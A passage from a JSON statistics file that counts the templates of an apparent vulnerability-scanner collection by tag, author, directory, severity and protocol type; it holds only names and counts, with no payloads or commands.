,"count":1},{"name":"flexbe","count":1},{"name":"scs","count":1},{"name":"selea","count":1},{"name":"ricoh","count":1},{"name":"sqlite","count":1},{"name":"cve2006","count":1},{"name":"b2evolution","count":1},{"name":"nerdgraph","count":1},{"name":"lutron","count":1},{"name":"simplecrm","count":1},{"name":"gridx","count":1},{"name":"jenkin","count":1},{"name":"asus","count":1},{"name":"loganalyzer","count":1},{"name":"servicedesk","count":1},{"name":"xunchi","count":1},{"name":"tamronos","count":1},{"name":"dompdf","count":1},{"name":"pippoint","count":1},{"name":"openweather","count":1},{"name":"jsp","count":1},{"name":"xampp","count":1},{"name":"buttercms","count":1},{"name":"cgi","count":1},{"name":"cerebro","count":1},{"name":"adiscon","count":1},{"name":"viewlinc","count":1},{"name":"majordomo2","count":1},{"name":"flink","count":1},{"name":"elasticsearch","count":1},{"name":"perl","count":1},{"name":"proftpd","count":1},{"name":"nimble","count":1},{"name":"webftp","count":1},{"name":"shopizer","count":1},{"name":"clave","count":1},{"name":"skywalking","count":1},{"name":"messaging","count":1},{"name":"fastapi","count":1},{"name":"lancom","count":1},{"name":"sql","count":1},{"name":"tieline","count":1},{"name":"woocommerce","count":1},{"name":"cscart","count":1},{"name":"floc","count":1},{"name":"interlib","count":1},{"name":"websvn","count":1},{"name":"wildfly","count":1},{"name":"zmanda","count":1},{"name":"shopware","count":1},{"name":"subrion","count":1},{"name":"pulsesecure","count":1},{"name":"syslog","count":1},{"name":"openstack","count":1},{"name":"elevation","count":1},{"name":"vidyo","count":1},{"name":"wooyun","count":1},{"name":"spip","count":1},{"name":"clockwork","count":1},{"name":"remkon","count":1},{"name":"gitea","count":1},{"name":"tapestry","count":1},{"name":"tika","count":1},{"name":"traefik","count":1},{"name":"nweb2fax","count":1},{"name":"digitalocean","count":1},{"name":"imap","count":1},{"name":"idemia","count":1},{"name":"haproxy","count":1},{"name":"ssl","count":1},{"name":"openerp","count":1},{"name":"commscope","count":1},{"name":"omi","count":1},{"name":"phpshowtime","count":1},{"name":"postgres","count":1},{"name":"st","count":1},{"name":"speed","count":1},{"name":"wakatime","count":1},{"name":"gstorage","count":1},{"name":"nuxeo","count":1},{"name":"achecker","count":1},{"name":"sarg","count":1},{"name":"oidc","count":1},{"name":"opentsdb","count":1},{"name":"kerbynet","count":1},{"name":"bedita","count":1},{"name":"cobub","count":1},{"name":"froxlor","count":1},{"name":"rujjie","count":1},{"name":"rmc","count":1},{"name":"optiLink","count":1},{"name":"nearby","count":1},{"name":"dvr","count":1},{"name":"minimouse","count":1},{"name":"mautic","count":1},{"name":"zte","count":1},{"name":"extractor","count":1},{"name":"clockwatch","count":1},{"name":"trilithic","count":1},{"name":"myvuehelp","count":1},{"name":"clink-office","count":1},{"name":"ognl","count":1},{"name":"okta","count":1},{"name":"metabase","count":1},{"name":"graylog","count":1},{"name":"iceflow","count":1},{"name":"blind","count":1},{"name":"qdpm","count":1},{"name":"drone","count":1},{"name":"expose","count":1},{"name":"locations","count":1},{"name":"duomicms","count":1},{"name":"ruckus","count":1},{"name":"placeos","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"opm","count":1},{"name":"darkstat","count":1},{"name":"varnish","count":1},{"name":"pivotaltracker","count":1},{"name":"maxsite","count":1},{"name":"zeroshell","count":1},{"name":"tracer","count":1},{"name":"visualtools","count":1},{"name":" default-login","count":1},{"name":"salesforce","count":1},{"name":"plone","count":1},{"name":"deviantart","count":1},{"name":"chevereto","count":1},{"name":"blue-ocean","count":1},{"name":"zarafa","count":1},{"name":"krweb","count":1},{"name":"natemail","count":1},{"name":"timezone","count":1},{"name":"nc2","count":1},{"name":"xml","count":1},{"name":"magicflow","count":1},{"name":"gloo","count":1},{"name":"sage","count":1},{"name":"totaljs","count":1},{"name":"wazuh","count":1},{"name":"plugin","count":1},{"name":"basic-auth","count":1},{"name":"apos","count":1},{"name":"hiboss","count":1},{"name":"cve202","count":1},{"name":"jenzabar","count":1},{"name":"mantis","count":1},{"name":"okiko","count":1},{"name":"javamelody","count":1},{"name":"photo","count":1},{"name":"dnssec","count":1},{"name":"graphql","count":1},{"name":"terraform","count":1},{"name":"ilo4","count":1},{"name":"yealink","count":1},{"name":"episerver","count":1},{"name":"postmessage","count":1},{"name":"novnc","count":1},{"name":"tensorflow","count":1},{"name":"newrelic","count":1},{"name":"fortinet","count":1},{"name":"openx","count":1},{"name":"eyelock","count":1},{"name":"announcekit","count":1},{"name":"gateone","count":1},{"name":"tinypng","count":1},{"name":"szhe","count":1},{"name":"ganglia","count":1},{"name":"bazarr","count":1},{"name":"spring","count":1},{"name":"openrestry","count":1},{"name":"embedthis","count":1},{"name":"codemeter","count":1},{"name":"qvisdvr","count":1},{"name":"xiuno","count":1},{"name":"bingmaps","count":1},{"name":"playable","count":1},{"name":"synnefo","count":1},{"name":"moin","count":1},{"name":"raspap","count":1},{"name":"cloudinary","count":1},{"name":"k8s","count":1},{"name":"find","count":1},{"name":"smartblog","count":1},{"name":"memcached","count":1},{"name":"discourse","count":1},{"name":"huijietong","count":1},{"name":"dotnetnuke","count":1},{"name":"netgenie","count":1},{"name":"zm","count":1},{"name":"calendly","count":1},{"name":"mpsec","count":1},{"name":"solarlog","count":1},{"name":"phpwiki","count":1},{"name":"logontracer","count":1},{"name":"wiki","count":1},{"name":"doh","count":1},{"name":"redis","count":1},{"name":"asana","count":1},{"name":"artica","count":1},{"name":"fuelcms","count":1},{"name":"yzmcms","count":1},{"name":"couchbase","count":1},{"name":"emc","count":1},{"name":"owasp","count":1},{"name":"tenda","count":1},{"name":"svnserve","count":1},{"name":"oneblog","count":1},{"name":"diris","count":1},{"name":"frontpage","count":1},{"name":"weiphp","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"cloudron","count":1},{"name":"centreon","count":1},{"name":"plastic","count":1},{"name":"iptime","count":1},{"name":"sonarcloud","count":1},{"name":"tectuus","count":1},{"name":"camunda","count":1},{"name":"meraki","count":1},{"name":"jumpcloud","count":1},{"name":"hubspot","count":1},{"name":"bash","count":1},{"name":"tpshop","count":1},{"name":"circontrol","count":1},{"name":"wmt","count":1},{"name":"listserv","count":1},{"name":"vscode","count":1},{"name":"labtech","count":1},{"name":"chinaunicom","count":1},{"name":"sgp","count":1},{"name":"default","count":1},{"name":"lokalise","count":1},{"name":"shopxo","count":1},{"name":"sangfor","count":1},{"name":"exponentcms","count":1},{"name":"csrf","count":1},{"name":"landray","count":1},{"name":"pgadmin","count":1},{"name":"etouch","count":1},{"name":"node-red-dashboard","count":1},{"name":"sendgrid","count":1},{"name":"viewpoint","count":1},{"name":"redmine","count":1},{"name":"tongda","count":1},{"name":"tileserver","count":1},{"name":"trane","count":1},{"name":"landrayoa","count":1},{"name":"gsoap","count":1},{"name":"pagerduty","count":1},{"name":"buildkite","count":1},{"name":"nette","count":1},{"name":"ewebs","count":1},{"name":"sceditor","count":1},{"name":"gotmls","count":1},{"name":"primetek","count":1},{"name":"mantisbt","count":1},{"name":"vsphere","count":1},{"name":"triconsole","count":1},{"name":"jfrog","count":1},{"name":"uwsgi","count":1},{"name":"ioncube","count":1},{"name":"centos","count":1},{"name":"manager","count":1},{"name":"zend","count":1},{"name":"fcm","count":1},{"name":"fortigate","count":1},{"name":"webui","count":1},{"name":"dom","count":1},{"name":"socomec","count":1},{"name":"mongo","count":1},{"name":"cloudflare","count":1},{"name":"zcms","count":1},{"name":"pendo","count":1},{"name":"vsftpd","count":1},{"name":"azkaban","count":1},{"name":"monitorr","count":1},{"name":"dbeaver","count":1},{"name":"mod-proxy","count":1},{"name":"finereport","count":1},{"name":"ntopng","count":1},{"name":"faraday","count":1},{"name":"servicenow","count":1},{"name":"geutebruck","count":1},{"name":"turbocrm","count":1},{"name":"alertmanager","count":1},{"name":"k8","count":1},{"name":"swagger","count":1},{"name":"csod","count":1},{"name":"bullwark","count":1},{"name":"mysql","count":1},{"name":"octoprint","count":1},{"name":"ambari","count":1},{"name":"zzzcms","count":1},{"name":"daybyday","count":1},{"name":"ssltls","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":280},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":66},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"melbadry9","count":10},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"aashiq","count":8},{"name":"zh","count":8},{"name":"that_juan_","count":8},{"name":"iamthefrogy","count":8},{"name":"randomstr1ng","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"emadshanab","count":7},{"name":"oppsec","count":7},{"name":"dogasantos","count":7},{"name":"techryptic (@tech)","count":7},{"name":"pentest_swissky","count":6},{"name":"logicalhunter","count":6},{"name":"puzzlepeaches","count":6},{"name":"divya_mudgal","count":6},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"elsfa7110","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"lu4nx","count":5},{"name":"ganofins","count":5},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"johnk3r","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"incogbyte","count":4},{"name":"nodauf","count":4},{"name":"tess","count":4},{"name":"github.com/its0x08","count":4},{"name":"0w4ys","count":3},{"name":"sullo","count":3},{"name":"fyoorer","count":3},{"name":"f1tz","count":3},{"name":"me9187","count":3},{"name":"z3bd","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"idealphase","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"binaryfigments","count":3},{"name":"emenalf","count":3},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"sushantkamble","count":3},{"name":"shifacyclewala","count":3},{"name":"impramodsargar","count":3},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"vsh00t","count":3},{"name":"thomas_from_offensity","count":3},{"name":"manas_harsh","count":2},{"name":"0xsapra","count":2},{"name":"whoever","count":2},{"name":"randomrobbie","count":2},{"name":"afaq","count":2},{"name":"bsysop","count":2},{"name":"amsda","count":2},{"name":"ehsahil","count":2},{"name":"cocxanh","count":2},{"name":"r12w4n","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"0xprial","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"sy3omda","count":2},{"name":"arcc","count":2},{"name":"w4cky_","count":2},{"name":"r3naissance","count":2},{"name":"nkxxkn","count":2},{"name":"koti2","count":2},{"name":"convisoappsec","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"ree4pwn","count":2},{"name":"zomsop82","count":2},{"name":"dheerajmadhukar","count":2},{"name":"0xrudra","count":2},{"name":"bernardofsr","count":2},{"name":"hetroublemakr","count":2},{"name":"parth","count":2},{"name":"socketz","count":2},{"name":"vavkamil","count":2},{"name":"huowuzhao","count":2},{"name":"fabaff","count":2},{"name":"alifathi-h1","count":2},{"name":"pxmme1337","count":2},{"name":"swissky","count":2},{"name":"0xelkomy","count":2},{"name":"0xcrypto","count":2},{"name":"hahwul","count":2},{"name":"bp0lr","count":2},{"name":"g4l1t0","count":2},{"name":"lotusdll","count":2},{"name":"x1m_martijn","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"moritz nentwig","count":2},{"name":"mohammedsaneem","count":2},{"name":"davidmckennirey","count":2},{"name":"absshax","count":1},{"name":"andysvints","count":1},{"name":"0xrod","count":1},{"name":"ohlinge","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"52971","count":1},{"name":"0xtavian","count":1},{"name":"alperenkesk","count":1},{"name":"kurohost","count":1},{"name":"defr0ggy","count":1},{"name":"micha3lb3n","count":1},{"name":"its0x08","count":1},{"name":"yavolo","count":1},{"name":"hanlaomo","count":1},{"name":"patralos","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"vzamanillo","count":1},{"name":"lark lab","count":1},{"name":"nvn1729","count":1},{"name":"push4d","count":1},{"name":"wabafet","count":1},{"name":"droberson","count":1},{"name":"furkansenan","count":1},{"name":"orpheus","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"tirtha_mandal","count":1},{"name":"streetofhackerr007","count":1},{"name":"yashanand155","count":1},{"name":"evolutionsec","count":1},{"name":"schniggie","count":1},{"name":"juicypotato1","count":1},{"name":"yashgoti","count":1},{"name":"sec_hawk","count":1},{"name":"zhenwarx","count":1},{"name":"akash.c","count":1},{"name":"affix","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"j33n1k4","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"iampritam","count":1},{"name":"0h1in9e","count":1},{"name":"elmahdi","count":1},{"name":"rotemreiss","count":1},{"name":"mesaglio","count":1},{"name":"clarkvoss","count":1},{"name":"_c0wb0y_","count":1},{"name":"thebinitghimire","count":1},{"name":"qlkwej","count":1},{"name":"ahmetpergamum","count":1},{"name":"exploitation","count":1},{"name":"kabirsuda","count":1},{"name":"jteles","count":1},{"name":"shreyapohekar","count":1},{"name":"borna nematzadeh","count":1},{"name":"rojanrijal","count":1},{"name":"remonsec","count":1},{"name":"shelld3v","count":1},{"name":"co0nan","count":1},{"name":"thevillagehacker","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"shifacyclewla","count":1},{"name":"ringo","count":1},{"name":"c3l3si4n","count":1},{"name":"bad5ect0r","count":1},{"name":"s1r1u5_","count":1},{"name":"fopina","count":1},{"name":"0xteles","count":1},{"name":"jrolf","count":1},{"name":"gboddin","count":1},{"name":"luskabol","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"ooooooo_q","count":1},{"name":"soyelmago","count":1},{"name":"berkdusunur","count":1},{"name":"x6263","count":1},{"name":"0ut0fb4nd","count":1},{"name":"pratik khalane","count":1},{"name":"zandros0","count":1},{"name":"b0rn2r00t","count":1},{"name":"whynotke","count":1},{"name":"tim_koopmans","count":1},{"name":"willd96","count":1},{"name":"ldionmarcil","count":1},{"name":"bjhulst","count":1},{"name":"apt-mirror","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"adrianmf","count":1},{"name":"brabbit10","count":1},{"name":"regala_","count":1},{"name":"un-fmunozs","count":1},{"name":"andirrahmani1","count":1},{"name":"naglinagli","count":1},{"name":"noamrathaus","count":1},{"name":"omarkurt","count":1},{"name":"sickwell","count":1},{"name":"nerrorsec","count":1},{"name":"forgedhallpass","count":1},{"name":"intx0x80","count":1},{"name":"akshansh","count":1},{"name":"ilovebinbash","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"d0rkerdevil","count":1},{"name":"smaranchand","count":1},{"name":"manuelbua","count":1},{"name":"toufik airane","count":1},{"name":"rodnt","count":1},{"name":"luci","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"oscarintherocks","count":1},{"name":"kre80r","count":1},{"name":"thezakman","count":1},{"name":"chron0x","count":1},{"name":"@ofjaaah","count":1},{"name":"philippdelteil","count":1},{"name":"xstp","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"makyotox","count":1},{"name":"geraldino2","count":1},{"name":"elder tao","count":1},{"name":"flag007","count":1},{"name":"pudsec","count":1},{"name":"cristi vlad (@cristivlad25)","count":1},{"name":"bolli95","count":1},{"name":"notsoevilweasel","count":1},{"name":"dawid-czarnecki","count":1},{"name":"knassar702","count":1},{"name":"udyz","count":1},{"name":"alex","count":1},{"name":"revblock","count":1},{"name":"sicksec","count":1},{"name":"mah3sec_","count":1},{"name":"hakluke","count":1},{"name":"ipanda","count":1},{"name":"mhdsamx","count":1},{"name":"mass0ma","count":1},{"name":"b0yd","count":1},{"name":"daviey","count":1},{"name":"izn0u","count":1},{"name":"taielab","count":1},{"name":"elouhi","count":1},{"name":"sshell","count":1},{"name":"retr0","count":1},{"name":"alph4byt3","count":1},{"name":"mubassirpatel","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"b4uh0lz","count":1},{"name":"0xd0ff9","count":1},{"name":"aresx","count":1},{"name":"kareemse1im","count":1},{"name":"_darrenmartyn","count":1},{"name":"_harleo","count":1},{"name":"ahmed sherif","count":1},{"name":"undefl0w","count":1},{"name":"ajaysenr","count":1},{"name":"nytr0gen","count":1},{"name":"infosecsanyam","count":1},{"name":"deena","count":1},{"name":"pdp","count":1},{"name":"blckraven","count":1},{"name":"cookiehanhoan","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"becivells","count":1},{"name":"jeya seelan","count":1},{"name":"petruknisme","count":1},{"name":"fmunozs","count":1}],"directory":[{"name":"cves","count":832},{"name":"vulnerabilities","count":327},{"name":"exposed-panels","count":269},{"name":"technologies","count":201},{"name":"exposures","count":191},{"name":"misconfiguration","count":140},{"name":"takeovers","count":65},{"name":"token-spray","count":63},{"name":"default-logins","count":60},{"name":"file","count":50},{"name":"workflows","count":38},{"name":"network","count":32},{"name":"iot","count":27},{"name":"miscellaneous","count":24},{"name":"dns","count":12},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5}],"severity":[{"name":"info","count":749},{"name":"high","count":645},{"name":"medium","count":474},{"name":"critical","count":294},{"name":"low","count":155}],"types":[{"name":"http","count":2205},{"name":"file","count":50},{"name":"network","count":45},{"name":"dns","count":12}]} +{"tags":[{"name":"cve","count":827},{"name":"lfi","count":337},{"name":"panel","count":267},{"name":"xss","count":258},{"name":"wordpress","count":249},{"name":"exposure","count":239},{"name":"rce","count":212},{"name":"tech","count":195},{"name":"wp-plugin","count":172},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":88},{"name":"apache","count":73},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"iot","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"redirect","count":37},{"name":"cve2016","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":28},{"name":"jira","count":28},{"name":"cve2015","count":28},{"name":"cisco","count":27},{"name":"listing","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"misc","count":23},{"name":"disclosure","count":23},{"name":"router","count":21},{"name":"misconfig","count":20},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"cve2012","count":18},{"name":"sap","count":18},{"name":"debug","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"login","count":14},{"name":"struts","count":14},{"name":"weblogic","count":14},{"name":"aws","count":14},{"name":"cve2009","count":14},{"name":"fuzz","count":14},{"name":"dns","count":13},{"name":"android","count":13},{"name":"zoho","count":13},{"name":"adobe","count":13},{"name":"deserialization","count":13},{"name":"jenkins","count":12},{"name":"manageengine","count":12},{"name":"dlink","count":12},{"name":"wp-theme","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"xxe","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"nginx","count":8},{"name":"backup","count":8},{"name":"cve2008","count":8},{"name":"ruijie","count":8},{"name":"fastjson","count":8},{"name":"cnvd","count":8},{"name":"rails","count":8},{"name":"ibm","count":8},{"name":"microsoft","count":8},{"name":"airflow","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"coldfusion","count":7},{"name":"cms","count":7},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"netgear","count":7},{"name":"api","count":6},{"name":"camera","count":6},{"name":"django","count":6},{"name":"citrix","count":6},{"name":"laravel","count":6},{"name":"jetty","count":6},{"name":"rconfig","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"docker","count":6},{"name":"lucee","count":6},{"name":"solr","count":6},{"name":"fileupload","count":6},{"name":"ssti","count":5},{"name":"tomcat","count":5},{"name":"circarlife","count":5},{"name":"phpmyadmin","count":5},{"name":"iis","count":5},{"name":"java","count":5},{"name":"crlf","count":5},{"name":"printer","count":5},{"name":"jolokia","count":5},{"name":"windows","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"symantec","count":4},{"name":"traversal","count":4},{"name":"solarwinds","count":4},{"name":"zimbra","count":4},{"name":"webserver","count":4},{"name":"asp","count":4},{"name":"artifactory","count":4},{"name":"firmware","count":4},{"name":"git","count":4},{"name":"exchange","count":4},{"name":"thinkcmf","count":4},{"name":"moodle","count":4},{"name":"zabbix","count":4},{"name":"symfony","count":4},{"name":"amazon","count":4},{"name":"glpi","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"hongdian","count":4},{"name":"firebase","count":4},{"name":"strapi","count":4},{"name":"resin","count":4},{"name":"buffalo","count":4},{"name":"vpn","count":4},{"name":"proxy","count":4},{"name":"grafana","count":4},{"name":"fatpipe","count":4},{"name":"npm","count":4},{"name":"magmi","count":4},{"name":"wso2","count":4},{"name":"slack","count":4},{"name":"samsung","count":4},{"name":"rfi","count":4},{"name":"elastic","count":4},{"name":"vbulletin","count":3},{"name":"bitrix","count":3},{"name":"springcloud","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"nexus","count":3},{"name":"kafka","count":3},{"name":"druid","count":3},{"name":"r-seenet","count":3},{"name":"cve2007","count":3},{"name":"fanruan","count":3},{"name":"backdoor","count":3},{"name":"telerik","count":3},{"name":"lfr","count":3},{"name":"microstrategy","count":3},{"name":"zhiyuan","count":3},{"name":"mail","count":3},{"name":"azure","count":3},{"name":"search","count":3},{"name":"injection","count":3},{"name":"exposures","count":3},{"name":"bigip","count":3},{"name":"prometheus","count":3},{"name":"ofbiz","count":3},{"name":"jeesns","count":3},{"name":"httpd","count":3},{"name":"terramaster","count":3},{"name":"ebs","count":3},{"name":"caucho","count":3},{"name":"github","count":3},{"name":"cloud","count":3},{"name":"mongodb","count":3},{"name":"kibana","count":3},{"name":"nacos","count":3},{"name":"nosqli","count":3},{"name":"node","count":3},{"name":"hoteldruid","count":3},{"name":"itop","count":3},{"name":"jellyfin","count":3},{"name":"log","count":3},{"name":"linkerd","count":3},{"name":"opensis","count":3},{"name":"openssh","count":3},{"name":"kevinlab","count":3},{"name":"openam","count":3},{"name":"oa","count":3},{"name":"cves","count":3},{"name":"smtp","count":3},{"name":"tikiwiki","count":3},{"name":"lansweeper","count":3},{"name":"cacti","count":3},{"name":"paloalto","count":2},{"name":"ec2","count":2},{"name":"mailchimp","count":2},{"name":"huawei","count":2},{"name":"cve2005","count":2},{"name":"enumeration","count":2},{"name":"dos","count":2},{"name":"openfire","count":2},{"name":"nextcloud","count":2},{"name":"grav","count":2},{"name":"igs","count":2},{"name":"nextjs","count":2},{"name":"bucket","count":2},{"name":"couchdb","count":2},{"name":"maian","count":2},{"name":"qihang","count":2},{"name":"smb","count":2},{"name":"horde","count":2},{"name":"shellshock","count":2},{"name":"waf","count":2},{"name":"s3","count":2},{"name":"status","count":2},{"name":"geowebserver","count":2},{"name":"aviatrix","count":2},{"name":"hostheader-injection","count":2},{"name":"backups","count":2},{"name":"spark","count":2},{"name":"commax","count":2},{"name":"activemq","count":2},{"name":"linux","count":2},{"name":"liferay","count":2},{"name":"jsf","count":2},{"name":"jboss","count":2},{"name":"yapi","count":2},{"name":"ecoa","count":2},{"name":"lotus","count":2},{"name":"akkadian","count":2},{"name":"text","count":2},{"name":"seeyon","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"db","count":2},{"name":"justwriting","count":2},{"name":"adminer","count":2},{"name":"kentico","count":2},{"name":"bruteforce","count":2},{"name":"rockmongo","count":2},{"name":"ucmdb","count":2},{"name":"plesk","count":2},{"name":"places","count":2},{"name":"sonicwall","count":2},{"name":"sitecore","count":2},{"name":"wordfence","count":2},{"name":"prtg","count":2},{"name":"netis","count":2},{"name":"globalprotect","count":2},{"name":"dolibarr","count":2},{"name":"prestashop","count":2},{"name":"upload","count":2},{"name":"mida","count":2},{"name":"chiyu","count":2},{"name":"frp","count":2},{"name":"payara","count":2},{"name":"keycloak","count":2},{"name":"harbor","count":2},{"name":"fortios","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"minio","count":2},{"name":"trixbox","count":2},{"name":"ilo","count":2},{"name":"vcenter","count":2},{"name":"heroku","count":2},{"name":"guacamole","count":2},{"name":"kong","count":2},{"name":"hpe","count":2},{"name":"natshell","count":2},{"name":"totemomail","count":2},{"name":"aruba","count":2},{"name":"ecology","count":2},{"name":"service","count":2},{"name":"yii","count":2},{"name":"akamai","count":2},{"name":"hashicorp","count":2},{"name":"chamilo","count":2},{"name":"nagios","count":2},{"name":"xxljob","count":2},{"name":"axis","count":2},{"name":"bitly","count":2},{"name":"mcafee","count":2},{"name":"netsweeper","count":2},{"name":"axis2","count":2},{"name":"sharepoint","count":2},{"name":"splunk","count":2},{"name":"vrealize","count":2},{"name":"hjtcloud","count":2},{"name":"idrac","count":2},{"name":"rancher","count":2},{"name":"leak","count":2},{"name":"qcubed","count":2},{"name":"glassfish","count":2},{"name":"chyrp","count":2},{"name":"voipmonitor","count":2},{"name":"embed","count":2},{"name":"phpcollab","count":2},{"name":"electron","count":2},{"name":"bypass","count":2},{"name":"rstudio","count":2},{"name":"storage","count":2},{"name":"tidb","count":2},{"name":"odoo","count":2},{"name":"cache","count":2},{"name":"favicon","count":2},{"name":"sonarqube","count":2},{"name":"saltstack","count":2},{"name":"wuzhicms","count":2},{"name":"flir","count":2},{"name":"getsimple","count":2},{"name":"jeedom","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"hasura","count":2},{"name":"openvpn","count":2},{"name":"webcam","count":2},{"name":"middleware","count":2},{"name":"wmt","count":1},{"name":"route","count":1},{"name":"office365","count":1},{"name":"shoretel","count":1},{"name":"hiawatha","count":1},{"name":"blue-ocean","count":1},{"name":"openrestry","count":1},{"name":"fiori","count":1},{"name":"playable","count":1},{"name":"acme","count":1},{"name":"sangfor","count":1},{"name":"cockpit","count":1},{"name":"jitsi","count":1},{"name":"wazuh","count":1},{"name":"extractor","count":1},{"name":"node-red-dashboard","count":1},{"name":"graphql","count":1},{"name":"iceflow","count":1},{"name":"nsasg","count":1},{"name":"karel","count":1},{"name":"nedi","count":1},{"name":"mdb","count":1},{"name":"selea","count":1},{"name":"mariadb","count":1},{"name":"sidekiq","count":1},{"name":"redis","count":1},{"name":"messaging","count":1},{"name":"openemr","count":1},{"name":"cve202","count":1},{"name":"episerver","count":1},{"name":"aura","count":1},{"name":"netmask","count":1},{"name":"mongo","count":1},{"name":"adb","count":1},{"name":"starttls","count":1},{"name":"huijietong","count":1},{"name":"gilacms","count":1},{"name":"resourcespace","count":1},{"name":"razor","count":1},{"name":"adiscon","count":1},{"name":"wifisky","count":1},{"name":"feifeicms","count":1},{"name":"spotify","count":1},{"name":"yealink","count":1},{"name":"rdp","count":1},{"name":"jfrog","count":1},{"name":"oscommerce","count":1},{"name":"interlib","count":1},{"name":"landrayoa","count":1},{"name":"testrail","count":1},{"name":"ecom","count":1},{"name":"discord","count":1},{"name":"traefik","count":1},{"name":"circontrorl","count":1},{"name":"dompdf","count":1},{"name":"manager","count":1},{"name":"tamronos","count":1},{"name":"opentsdb","count":1},{"name":"meraki","count":1},{"name":"stripe","count":1},{"name":"plc","count":1},{"name":"trane","count":1},{"name":"weglot","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"centos","count":1},{"name":"tongda","count":1},{"name":"comodo","count":1},{"name":"gsoap","count":1},{"name":"ems","count":1},{"name":"mara","count":1},{"name":"avalanche","count":1},{"name":"redmine","count":1},{"name":"concrete","count":1},{"name":"expose","count":1},{"name":"darkstat","count":1},{"name":"elascticsearch","count":1},{"name":"linkedin","count":1},{"name":"panos","count":1},{"name":"iptime","count":1},{"name":"hubspot","count":1},{"name":"deviantart","count":1},{"name":"bing","count":1},{"name":"dotnet","count":1},{"name":"klog","count":1},{"name":"circleci","count":1},{"name":"streetview","count":1},{"name":"visualstudio","count":1},{"name":"graphite","count":1},{"name":"woocommerce","count":1},{"name":"exacqvision","count":1},{"name":"find","count":1},{"name":"tika","count":1},{"name":"jenzabar","count":1},{"name":"details","count":1},{"name":"flink","count":1},{"name":"fuelcms","count":1},{"name":"travis","count":1},{"name":"bedita","count":1},{"name":"spf","count":1},{"name":"solarlog","count":1},{"name":"cve2006","count":1},{"name":"stem","count":1},{"name":"fcm","count":1},{"name":"minimouse","count":1},{"n